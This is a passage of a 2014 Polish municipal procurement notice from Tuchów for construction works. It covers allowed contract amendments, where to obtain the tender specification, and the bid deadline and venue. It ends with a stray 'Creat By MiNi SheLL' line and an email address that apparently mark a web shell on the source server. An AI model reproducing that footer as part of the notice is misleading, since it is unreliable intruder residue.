2. Zamawiający przewiduje możliwość istotnej zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru oferty, w zakresie terminów jej wykonania lub w zakresie robót, w następujących okolicznościach: 
1. wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy - w zakresie dostosowania postanowień umowy do zmiany przepisów prawa;
2. zmiany nazwy lub formy prawnej stron - w zakresie dostosowania umowy do tych zmian;
3. wystąpienia siły wyższej (Siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych) - w zakresie dostosowania umowy do zmian nią spowodowanych;
4. wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających lub utrudniających przeprowadzenie w terminie robót budowlanych - w zakresie dostosowania umowy do zmian nią spowodowanych;
5. wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów, w zakresie dostosowania do celu zmiany;
6. wydłużenie terminu wykonania przedmiotu umowy, o ile nie będą wynikać z przyczyn leżących po stronie Wykonawcy - w zakresie dostosowania umowy do tych zmian;
7. zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, które nie były możliwe do przewidzenia w chwili zawarcia umowy - w zakresie dostosowania umowy do zmian nią spowodowanych;
8. zmiany zastosowanych materiałów, urządzeń i technologii wykonania przedstawionych w ofercie przetargowej (roboty zamienne), pod warunkiem, że zmiany te będą bardziej korzystne dla Zamawiającego i nie wpływają na prawidłowość wykonania przedmiotu zamówienia. Okoliczności, w których dopuszcza się zmiany zastosowanych materiałów, urządzeń i technologii wykonania to przykładowo:
1. okoliczności powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy;
2. okoliczności powodujące poprawę parametrów technicznych;
3. okoliczności wynikające z aktualizacji rozwiązań z uwagi na postęp techniczny, lub zmiany obowiązujących przepisów;
Zmiany, o których mowa powyżej nie będą stanowić istotnej zmiany zawartej umowy i nie wymagają aneksu do umowy w sytuacji, gdy z punktu widzenia przedmiotu zamówienia mają charakter nieistotny.
9. ograniczenie zakresu rzeczowego przedmiotu umowy, w sytuacji gdy wykonanie danych robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu umowy.
Zmiany powyższe nie mogą wpływać na zwiększenie ceny realizacji zamówienia przyjętej przez Zamawiającego w wyniku rozstrzygnięcia przetargu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.tuchow.BIP Tuchow/Zamówienia publiczne+ogłoszenia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie, 33-170 Tuchów ul. Jana Pawła II 4, pokój nr 24. Cena materiałów przetargowych wynosi 100,00 złotych (wersja papierowa dostępna w siedzibie Zamawiającego)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2014 godzina 10:00, miejsce: Ofertę należy złożyć do dnia 25.02.2014 r. do godz. 10.00 w siedzibie Zamawiającego - RATUSZ, Biuro Obsługi Klienta, pokój nr 7, parter. Otwarcie o godz. 10.30 - Sala konferencyjna (RATUSZ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com